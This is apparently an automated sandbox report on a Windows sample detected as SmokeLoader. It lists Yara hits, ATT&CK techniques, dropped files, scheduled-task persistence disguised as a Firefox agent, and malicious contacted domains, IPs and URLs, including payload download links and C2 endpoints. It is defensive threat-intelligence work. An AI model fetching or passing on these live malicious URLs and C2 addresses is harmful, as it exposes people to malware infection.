Source: Yara match	File source: 0000000C.00000003.2690701719.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2348513596.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 12.3.bbdeaec.5c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.C12E.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.C12E.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.bbdeaec.5a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.bbdeaec.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.C12E.exe.2170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2690701719.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2348513596.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Masquerading	OS Credential Dumping	11 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	32 Process Injection	12 Virtualization/Sandbox Evasion	LSASS Memory	521 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	1 DLL Side-Loading	32 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	115 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
HaPJ2rPP6w.exe	34%	ReversingLabs
HaPJ2rPP6w.exe	100%	Avira	HEUR/AGEN.1312571
HaPJ2rPP6w.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\bbdeaec	100%	Avira	HEUR/AGEN.1312571
C:\Users\user\AppData\Roaming\wideaec	100%	Avira	HEUR/AGEN.1312571
C:\Users\user\AppData\Local\Temp\C12E.exe	100%	Avira	HEUR/AGEN.1312571
C:\Users\user\AppData\Local\Temp\89ED.exe	100%	Avira	HEUR/AGEN.1304598
C:\Users\user\AppData\Roaming\bbdeaec	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\wideaec	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C12E.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\wideaec	34%	ReversingLabs

Source	Detection	Scanner	Label
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
codeberg.org	217.197.91.145	true	true	unknown
nwgrus.ru	177.129.90.106	true	true	unknown
calvinandhalls.com	unknown	unknown	true	unknown
bestworldhools.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
https://23.145.40.164/ksa9104.exe	true	unknown
http://unicea.ws/tmp/index.php	true	unknown
http://nwgrus.ru/tmp/index.php	true	unknown
https://codeberg.org/alexcode11/templates/raw/branch/main/setup.exe	true	unknown
http://tech-servers.in.net/tmp/index.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.mi	explorer.exe, 00000001.00000000.1771459949.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1773173699.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1770604413.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1773173699.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1771673269.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1769472585.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1768885292.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1770604413.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://sourceforge.net/projects/s-zipsfxbuilder/)	89ED.exe, 00000007.00000002.2479804876.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, 89ED.exe.1.dr	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1773173699.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.1773173699.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1773173699.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://word.office.com	explorer.exe, 00000001.00000000.1773173699.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micr	explorer.exe, 00000001.00000000.1771459949.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1765948040.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://brightdata.com	89ED.exe.1.dr	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1770604413.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1773173699.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1765948040.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1770604413.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1773173699.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1765948040.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
180.75.11.133	unknown	Malaysia	38322	WEBE-MY-AS-APWEBEDIGITALSDNBHDMY	true
177.129.90.106	nwgrus.ru	Brazil	262394	Internet58Ltda-MEBR	true
23.145.40.164	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
217.197.91.145	codeberg.org	Germany	29670	IN-BERLIN-ASIndividualNetworkBerlineVDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1526113
Start date and time:	2024-10-04 19:16:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HaPJ2rPP6w.exe renamed because original name is a hash value
Original Sample Name:	08e3912bd337bff072bd1346ddc39f3a.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/6@30/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 115 Number of non-executed functions: 91
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: HaPJ2rPP6w.exe

Simulations

Behavior and APIs

Time	Type	Description
13:17:27	API Interceptor	379275x Sleep call for process: explorer.exe modified
18:17:28	Task Scheduler	Run new task: Firefox Default Browser Agent 507FB5E973548843 path: C:\Users\user\AppData\Roaming\wideaec
18:18:33	Task Scheduler	Run new task: Firefox Default Browser Agent CE221422BCA9A0F9 path: C:\Users\user\AppData\Roaming\bbdeaec

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
180.75.11.133	4EtLXn5pqI.exe	Get hash	malicious	SmokeLoader	Browse	100xmargin.com/tmp/index.php
177.129.90.106	tUDGx14UG2.exe	Get hash	malicious	SmokeLoader	Browse	epohe.ru/tmp/
	fEz10JQnRZ.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	VfflPcEzWm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	BJRX4k4WYc.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	0S2jhDIWWK.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	CLEpUKkvK1.exe	Get hash	malicious	Amadey	Browse	jkshb.su/forum/index.php?scr=1
23.145.40.164	c7v62g0YpB.exe	Get hash	malicious	SmokeLoader	Browse
	9VgIkx4su0.exe	Get hash	malicious	SmokeLoader	Browse
	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse
	v173TV3V11.exe	Get hash	malicious	SmokeLoader	Browse
	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
217.197.91.145	LisectAVT_2403002B_286.exe	Get hash	malicious	Unknown	Browse
	CNWSFY59Z6S1D.JS	Get hash	malicious	WSHRAT	Browse
	CNWSFY59Z6S1D.JS	Get hash	malicious	WSHRAT	Browse
	6Y8CXBW7P6AR.JS	Get hash	malicious	Unknown	Browse
	Techspan Statement.xlsm	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
codeberg.org	LisectAVT_2403002B_286.exe	Get hash	malicious	Unknown	Browse	217.197.91.145
	CNWSFY59Z6S1D.JS	Get hash	malicious	WSHRAT	Browse	217.197.91.145
	CNWSFY59Z6S1D.JS	Get hash	malicious	WSHRAT	Browse	217.197.91.145
	6Y8CXBW7P6AR.JS	Get hash	malicious	Unknown	Browse	217.197.91.145
	Techspan Statement.xlsm	Get hash	malicious	Unknown	Browse	217.197.91.145
nwgrus.ru	c7v62g0YpB.exe	Get hash	malicious	SmokeLoader	Browse	190.147.2.86
	9VgIkx4su0.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse	58.151.148.90
	v173TV3V11.exe	Get hash	malicious	SmokeLoader	Browse	190.219.117.240
	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	189.61.54.32
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	181.52.122.51
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	187.131.253.169
	file.exe	Get hash	malicious	SmokeLoader	Browse	196.189.156.245
	k8JAXb3Lhs.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	187.228.112.175

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
Internet58Ltda-MEBR	tUDGx14UG2.exe	Get hash	malicious	SmokeLoader	Browse	177.129.90.106
	file.exe	Get hash	malicious	Python Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	177.129.90.106
	fEz10JQnRZ.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	177.129.90.106
	VfflPcEzWm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	177.129.90.106
	BJRX4k4WYc.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	177.129.90.106
	0S2jhDIWWK.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	177.129.90.106
	CLEpUKkvK1.exe	Get hash	malicious	Amadey	Browse	177.129.90.106
	fjL0EcgV6Y.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, Stealc	Browse	177.129.90.106
SURFAIRWIRELESS-IN-01US	c7v62g0YpB.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	9VgIkx4su0.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	v173TV3V11.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
IN-BERLIN-ASIndividualNetworkBerlineVDE	LisectAVT_2403002B_286.exe	Get hash	malicious	Unknown	Browse	217.197.91.145
	CNWSFY59Z6S1D.JS	Get hash	malicious	WSHRAT	Browse	217.197.91.145
	CNWSFY59Z6S1D.JS	Get hash	malicious	WSHRAT	Browse	217.197.91.145
	6Y8CXBW7P6AR.JS	Get hash	malicious	Unknown	Browse	217.197.91.145
	Techspan Statement.xlsm	Get hash	malicious	Unknown	Browse	217.197.91.145
	index	Get hash	malicious	Unknown	Browse	185.177.206.72
WEBE-MY-AS-APWEBEDIGITALSDNBHDMY	4EtLXn5pqI.exe	Get hash	malicious	SmokeLoader	Browse	180.75.11.133
	SecuriteInfo.com.Linux.Siggen.9999.13221.8731.elf	Get hash	malicious	Unknown	Browse	180.73.13.64
	mdfh8nJQAy.elf	Get hash	malicious	Mirai, Moobot	Browse	180.74.244.169
	firmware.armv5l.elf	Get hash	malicious	Unknown	Browse	180.75.175.46
	firmware.i586.elf	Get hash	malicious	Unknown	Browse	180.74.244.171
	teste.x86.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	120.139.129.240
	botx.mips.elf	Get hash	malicious	Mirai	Browse	180.73.25.29
	154.216.17.9-skid.arm5-2024-08-04T06_23_00.elf	Get hash	malicious	Mirai, Moobot	Browse	180.73.37.113
	54guV3J1pQ.elf	Get hash	malicious	Mirai	Browse	180.75.163.49
	93g0DCqh1e.elf	Get hash	malicious	Mirai	Browse	120.139.129.250

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
72a589da586844d7f0818ce684948eea	c7v62g0YpB.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	9VgIkx4su0.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	v173TV3V11.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
a0e9f5d64349fb13191bc781f81f42e1	loader.exe	Get hash	malicious	LummaC	Browse	217.197.91.145
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	217.197.91.145
	d1bc91bd44a0.exe	Get hash	malicious	PrivateLoader, Stealc, Vidar	Browse	217.197.91.145
	a43486128347.exe	Get hash	malicious	LummaC	Browse	217.197.91.145
	7f3c2473d1e6.exe	Get hash	malicious	LummaC, Vidar	Browse	217.197.91.145
	Payout Receipt.pptx	Get hash	malicious	HTMLPhisher	Browse	217.197.91.145
	setup.exe	Get hash	malicious	Unknown	Browse	217.197.91.145
	msvcp110.dll	Get hash	malicious	LummaC	Browse	217.197.91.145
	c7v62g0YpB.exe	Get hash	malicious	SmokeLoader	Browse	217.197.91.145
	PO20241003.xls	Get hash	malicious	Unknown	Browse	217.197.91.145

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	5.236946495216897
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
MD5:	5D20D9B3F928AC964E07C561FD8A3F42
SHA1:	B702BE149FCF94831A975F2CD06B2DFE020D9632
SHA-256:	59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
